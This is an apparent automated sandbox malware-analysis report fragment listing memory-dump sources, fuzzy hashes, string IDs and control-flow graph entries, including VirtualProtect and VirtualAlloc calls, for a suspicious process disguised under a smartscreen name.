                                                                                                      • Opcode ID: a842729222f44072f99ff48d2c9cbb05e5f7b15c52bb5e40b21451445ec978db
                                                                                                      • Instruction ID: ad8ed16a1bbe020149107806df4a6f00d820237bfe00183d216957b30c0b6638
                                                                                                      • Opcode Fuzzy Hash: a842729222f44072f99ff48d2c9cbb05e5f7b15c52bb5e40b21451445ec978db
                                                                                                      • Instruction Fuzzy Hash: 5BF0CD30A0D22A8BE714CFA4C8A43F9B3B0FB54300F040A7AD015832E2CBB86684CFC0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8bc000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 163384c0f88c1ff8f540d91166b13f804f5032787c7994554b301d4f7713e957
                                                                                                      • Instruction ID: da4fa5b68f2b9be0b836d0f6d180b7ee97ac9581057e342101efed885d8511d5
                                                                                                      • Opcode Fuzzy Hash: 163384c0f88c1ff8f540d91166b13f804f5032787c7994554b301d4f7713e957
                                                                                                      • Instruction Fuzzy Hash: 3BF0823581E38D8FDB519F74C9655D93FA0FF05300F4505FAE818C61A2DB349554CB41
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8B6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B6000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8b6000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f6a0695db53085cb6a13e14c691213f09762020df66258e61c56cf5f88350218
                                                                                                      • Instruction ID: c82132ec98d63748e2e50af5da0e0fcd9badc2220ed543b49aa6a646580c5ee2
                                                                                                      • Opcode Fuzzy Hash: f6a0695db53085cb6a13e14c691213f09762020df66258e61c56cf5f88350218
                                                                                                      • Instruction Fuzzy Hash: 59F0FE71E059298AE7A4DB28DC696A97AA1EF84745F1141FAD00D9A2D6CE342E834F40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8bc000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 40517fb8d16cbfe7a24ce3e6b771b1e2ebf1a47a8181be54e30d15a99c918e56
                                                                                                      • Instruction ID: 1cf0ad35ddcbc36988d42db278c499f4a848a9f40df3d54f49dcd7808a31dcf2
                                                                                                      • Opcode Fuzzy Hash: 40517fb8d16cbfe7a24ce3e6b771b1e2ebf1a47a8181be54e30d15a99c918e56
                                                                                                      • Instruction Fuzzy Hash: A8E0D83284E28D4FE361676088751D43F90FF05300F4605BAE04C860E3DA1C5558CB42
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8ca000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d96667ea489d6ddf68042b7462b62bf7c5f886a2abc16fdacbf68618fc6e1593
                                                                                                      • Instruction ID: c00480144541e9d029c5be940f6bbc020029dabb13e81213ae7c3a6a4a06578d
                                                                                                      • Opcode Fuzzy Hash: d96667ea489d6ddf68042b7462b62bf7c5f886a2abc16fdacbf68618fc6e1593
                                                                                                      • Instruction Fuzzy Hash: 74D02BA1F1494F47FB18EBC0C821ABD2F62EF10384F400078D46AAE1E9CF242D034780
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8f7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 948ac9d758c6c31c1c27691ebaca5092c2e4de9777b68126395164b8103bb3cd
                                                                                                      • Instruction ID: 80033d7110217501d2c5219ec31fb2c9294cd2d12766bb1716a1a0bceb8d751a
                                                                                                      • Opcode Fuzzy Hash: 948ac9d758c6c31c1c27691ebaca5092c2e4de9777b68126395164b8103bb3cd
                                                                                                      • Instruction Fuzzy Hash: B3D05EB5E19B1E9FEBA0DE58409835473A1FF14310F4200BD948893062DF385911DF00
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8C5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8c5000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $%$)$+$`
                                                                                                      • API String ID: 0-1941960537
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8f7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ($+$E$H$n
                                                                                                      • API String ID: 0-1773399086
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8f7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$j$u$}
                                                                                                      • API String ID: 0-684171762

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:3.7%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:7
                                                                                                      Total number of Limit Nodes:1
                                                                                                      execution_graph 20981 7ffd9b8c17ce 20982 7ffd9b8c17dd VirtualProtect 20981->20982 20984 7ffd9b8c191d 20982->20984 20985 7ffd9b8c31bd 20986 7ffd9b8c31db VirtualAlloc 20985->20986 20987 7ffd9b8c3173 20985->20987 20989 7ffd9b8c32f5 20986->20989
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8ca000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: qJ_H
                                                                                                      • API String ID: 0-3404634314
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8bc000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 1(x
                                                                                                      • API String ID: 0-3237925078

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 1(x
                                                                                                      • API String ID: 0-3237925078

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @
                                                                                                      • API String ID: 0-2766056989
                                                                                                      • Opcode ID: 10f6be02accdea8fd7d62e2ff77db0aaf6ef70f9c2ee68a3e4e38af9b57db3e9
                                                                                                      • Instruction ID: 10daf4ba2efc5297a213f041309d12e66d2550bbf5fcb4cf5589d5a24ec31789
                                                                                                      • Opcode Fuzzy Hash: 10f6be02accdea8fd7d62e2ff77db0aaf6ef70f9c2ee68a3e4e38af9b57db3e9
                                                                                                      • Instruction Fuzzy Hash: 9FF10E74E1965D9FDBA8DB58C8A5BA8B7F1FF58300F5106B9D04DE32A1DA346A80CF40

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8b0000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9c4bc506a4ee031489b558151015c0c5741877e46702bac7ad32b3f873339ac9
                                                                                                      • Instruction ID: 5f2d9a63f816d37312f1e32c0e3eb8c46260b23babd57725d25b73dfc850e270
                                                                                                      • Opcode Fuzzy Hash: 9c4bc506a4ee031489b558151015c0c5741877e46702bac7ad32b3f873339ac9
                                                                                                      • Instruction Fuzzy Hash: 46A1E171A18A9D8FE799DB68C8657A97FF1FF59304F4001BAD048D72E6CB782805CB81

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8C5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8c5000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: +$pO_H
                                                                                                      • API String ID: 0-3174383562
                                                                                                      • Opcode ID: cba1316061d1e5d4de150c412fd7e33a5d8011d10cfeb8d0856a63c1ba8d0d6c
                                                                                                      • Instruction ID: f860edcf78b7433ca9f67f518045b2a17af05d9ceb8e1cb84ae0c09abf0221ed
                                                                                                      • Opcode Fuzzy Hash: cba1316061d1e5d4de150c412fd7e33a5d8011d10cfeb8d0856a63c1ba8d0d6c
                                                                                                      • Instruction Fuzzy Hash: 0F11ECB4A1A61D8BDBB8DB58C8A47E977B1EB5C300F1141A9E00ED7395CE786B84CB40

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8B6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B6000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8b6000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$)
                                                                                                      • API String ID: 0-2010264150
                                                                                                      • Opcode ID: 9fd6aebf94105a3c3630c1fe5b4233f2709ee1ad4ebddc075256b72939c93031
                                                                                                      • Instruction ID: b13dcafab310b3614f50832ca9006d92f5bf462bd641c6c32ffca35281652be5
                                                                                                      • Opcode Fuzzy Hash: 9fd6aebf94105a3c3630c1fe5b4233f2709ee1ad4ebddc075256b72939c93031
                                                                                                      • Instruction Fuzzy Hash: 9411CE70D1662E8EEBB4AB69C8587A9B6B0FF08301F1140F9D44DA2291DB745AC48F46

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 765 7ffd9b8c17ce-7ffd9b8c17db 766 7ffd9b8c17e6-7ffd9b8c17f7 765->766 767 7ffd9b8c17dd-7ffd9b8c17e5 765->767 768 7ffd9b8c17f9-7ffd9b8c1801 766->768 769 7ffd9b8c1802-7ffd9b8c191b VirtualProtect 766->769 767->766 768->769 774 7ffd9b8c191d 769->774 775 7ffd9b8c1923-7ffd9b8c1973 769->775 774->775
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8c1000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 0316a038b8e9eb0b2cb2249e16bdb37a1aa7801c468ecbbd39aba21e29c0d2df
                                                                                                      • Instruction ID: d8287f73f67c48242572c84596b29e8831f841b83abbde8c8b56f25c95c7d645
                                                                                                      • Opcode Fuzzy Hash: 0316a038b8e9eb0b2cb2249e16bdb37a1aa7801c468ecbbd39aba21e29c0d2df
                                                                                                      • Instruction Fuzzy Hash: DC517D70D0864D8FDB58DFA8C885BEDBBF1FB6A310F1042AAD448E3251DB74A885CB41

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 862 7ffd9b8c31bd-7ffd9b8c31d9 863 7ffd9b8c31db-7ffd9b8c32f3 VirtualAlloc 862->863 864 7ffd9b8c3173-7ffd9b8c31ba 862->864 871 7ffd9b8c32f5 863->871 872 7ffd9b8c32fb-7ffd9b8c335f 863->872 871->872
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8c1000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 19d86ae87c507e2d1f69790e6fbda2095b3edf0e77a09985e595b26132a6d968
                                                                                                      • Instruction ID: 84d77b42f19d3f93b74a33ec777f94c847bb0548f253b6662ebdde184eebbfd5
                                                                                                      • Opcode Fuzzy Hash: 19d86ae87c507e2d1f69790e6fbda2095b3edf0e77a09985e595b26132a6d968
                                                                                                      • Instruction Fuzzy Hash: C0614E70908A5D8FDF98EF58C885BE9BBF1FB69310F1041AAD44DE3255DB30A985CB80

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 2G_^
                                                                                                      • API String ID: 0-3208857883
                                                                                                      • Opcode ID: 38965ee8b88ccab199b3ca1490ea9b7a9fe03a8b6d1faab2de608c4068e608df
                                                                                                      • Instruction ID: d2f9e31b1170dea2d679410746b1666f5e3cc1fd86fa33d85833eb01e68fb97a
                                                                                                      • Opcode Fuzzy Hash: 38965ee8b88ccab199b3ca1490ea9b7a9fe03a8b6d1faab2de608c4068e608df
                                                                                                      • Instruction Fuzzy Hash: 1F110635A081598FCB0AFF6CE8A59E97BA0EF45318F0440B7E15DC7197DE349942C780

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b1f46d6e71233a20baf02dd7e23ca2265f5da900713bc9655a806439f28d6dd5
                                                                                                      • Instruction ID: 21599a64ff39d9e0ecc0cfd284d6d1f060f367cea88e0f7fde073e688f303af6
                                                                                                      • Opcode Fuzzy Hash: b1f46d6e71233a20baf02dd7e23ca2265f5da900713bc9655a806439f28d6dd5
                                                                                                      • Instruction Fuzzy Hash: E5F13F71E1965D8FDB98DB98C8657B8BBA1FF58300F4442B9D00DD3292DA346A85CF41

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8C5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8c5000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5d56722339f73a14b8c7ef1eb29c17ffa6f9285979d6097fec14e01605c0f760
                                                                                                      • Instruction ID: 2e31925a6288af58259525345832f15a3b9c42e1385d9ff439bbb1d26fc4860b
                                                                                                      • Opcode Fuzzy Hash: 5d56722339f73a14b8c7ef1eb29c17ffa6f9285979d6097fec14e01605c0f760
                                                                                                      • Instruction Fuzzy Hash: 9D518F70A09A4E9FCF84EF98D494AED7BF1FF58311F0501AAE419E7261D634E991CB80

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 672eb0aa6e0076b14653c842c9bc069a6fbceb0d7f38949144b78ad3092bfa04
                                                                                                      • Instruction ID: 02c9fae3ae1ee3fb398523d89b19457471f3c478f38b43806f3b9fe9465d8c58
                                                                                                      • Opcode Fuzzy Hash: 672eb0aa6e0076b14653c842c9bc069a6fbceb0d7f38949144b78ad3092bfa04
                                                                                                      • Instruction Fuzzy Hash: 95517130E19A4E8FEBA4EF54C4A57B9B7A1FF58300F0145B5D019D72A6CE34AD45CB80

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8b0000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: edd9a4fd29d85c4b660e27d1b1d8d28701ef6ff13788b4e56e3f7584826eed8e
                                                                                                      • Instruction ID: 34d5ab2c3b082060eb0a4f2e0db7a2463a39444acdd983bbabd3ca7b88b2a70a
                                                                                                      • Opcode Fuzzy Hash: edd9a4fd29d85c4b660e27d1b1d8d28701ef6ff13788b4e56e3f7584826eed8e
                                                                                                      • Instruction Fuzzy Hash: 2451AB74E1952D8EDBA4DF14C898BA9B7F0FB68301F5041EAD00DE22A5DF786A84CF45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8C5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a76f504d77e3debe5c20e95fd24a42c3000834352b04d7026acf50c6c90c3dde
                                                                                                      • Instruction ID: 9fa6a46bb73e1b6f596b8194040186943554251831da2aca308f8deb7671a6d3
                                                                                                      • Opcode Fuzzy Hash: a76f504d77e3debe5c20e95fd24a42c3000834352b04d7026acf50c6c90c3dde
                                                                                                      • Instruction Fuzzy Hash: 50111870918A8D8FCF85EF68C899AE97BF0FF28301F0501AAD459D72A1D7349594CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8bc000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 91a21b3c588184331fb9a5aa1fcfc0362dc7e2c8cb1555b8819713f5e43d667f
                                                                                                      • Instruction ID: c37415c49ea3ab37506bb8f493dfc8de359cd75f9a4166de9dba686cf7d74375
                                                                                                      • Opcode Fuzzy Hash: 91a21b3c588184331fb9a5aa1fcfc0362dc7e2c8cb1555b8819713f5e43d667f
                                                                                                      • Instruction Fuzzy Hash: 4301D43195E7CD9FE7A29BB048650E53FB0EF06215F0644FAD489D70A3D928564ACB41
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 32e3edd1c0bc2b78ec6e8accf2310d71a1eb78a61618887208eef1895c74c55d
                                                                                                      • Instruction ID: 734d44d9bb5f2f6198d30904a328d59bcd6fbeb64170a6203de4ad15fbf13225
                                                                                                      • Opcode Fuzzy Hash: 32e3edd1c0bc2b78ec6e8accf2310d71a1eb78a61618887208eef1895c74c55d
                                                                                                      • Instruction Fuzzy Hash: 85014C7090968C8FDB45DF68C8699D97FB0FF29304F0541AAE449C71A2DB34A994CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f55f58645b3617e4367fe24e1ae15adf64b8b50b58b12a70f9d535ab575811f0
                                                                                                      • Instruction ID: a2c93af6b6641eab6b9e780c3c479cf60bc0183b3ba8de18ccb86251eaad829c
                                                                                                      • Opcode Fuzzy Hash: f55f58645b3617e4367fe24e1ae15adf64b8b50b58b12a70f9d535ab575811f0
                                                                                                      • Instruction Fuzzy Hash: 27011E3090864D8FCF95EF58C898AEA7BF0FF69304F05059AE418D71A2DB75D954CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 23a8374831ad44c633ec5c19d17a726b485ac772174e4e2e09b00b87aacd720e
                                                                                                      • Instruction ID: d2600fa33fc3981b31262291eb3564bba20c3d6fa1b6615976cad68a146ab82c
                                                                                                      • Opcode Fuzzy Hash: 23a8374831ad44c633ec5c19d17a726b485ac772174e4e2e09b00b87aacd720e
                                                                                                      • Instruction Fuzzy Hash: 4E014C30909A8C8FCB55EF18C8A9AD97FF0FF69300F0501AAE408C71A1DB35A994CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8ca000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a22d0af066ba8ce04ac05d1382edf7e13527b46a33ed387b71cc67d3c6510cd7
                                                                                                      • Instruction ID: 372acf8cc0a3980b5c4508f5c54a00ed55306302990ab3fda26e70183125f494
                                                                                                      • Opcode Fuzzy Hash: a22d0af066ba8ce04ac05d1382edf7e13527b46a33ed387b71cc67d3c6510cd7
                                                                                                      • Instruction Fuzzy Hash: AA01DA30914A0D8FDF84EF58C849AEE77F0FB28305F00056AA81DD32A0DB34A594CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e03d5804c4963e05b799dc2c67c4969e495746f273292ec762011a414bf330e4
                                                                                                      • Instruction ID: 482f9a9be1cf2e064fb93bb1fe9938e9bed46a08e8564c88e682dedad84cedee
                                                                                                      • Opcode Fuzzy Hash: e03d5804c4963e05b799dc2c67c4969e495746f273292ec762011a414bf330e4
                                                                                                      • Instruction Fuzzy Hash: 1B11173090968D8FCB86DF68C864AAA7BB0FF25300B0545AAE418D71A2D7749A58CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b7898342ca443b83cbbf0379daf114ad52ad0507594cae7e20aeecea64cce48e
                                                                                                      • Instruction ID: 860169948725e23eb32ada2fa35bd91ea7b4af03e1691aed910ede2446494b6e
                                                                                                      • Opcode Fuzzy Hash: b7898342ca443b83cbbf0379daf114ad52ad0507594cae7e20aeecea64cce48e
                                                                                                      • Instruction Fuzzy Hash: DB01A870914A4D9FDF84EF68C849AEE7BF0FB68305F10056AA81DD3264DB31E594CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d08adaffde8df015f1777c72c375cffb62c3072cf80e8360018d3a0bdac30d75
                                                                                                      • Instruction ID: 9d3a7cdb268e8e3c3ecbaf2f243367f668da2137b9b71c4b0f0713f22d90aa3f
                                                                                                      • Opcode Fuzzy Hash: d08adaffde8df015f1777c72c375cffb62c3072cf80e8360018d3a0bdac30d75
                                                                                                      • Instruction Fuzzy Hash: B701A870914A4D9FDF84EF68C849AEE7BF1FB68305F00056AA81DD3264DB71E594CB81
                                                                                                      Memory Dump Source
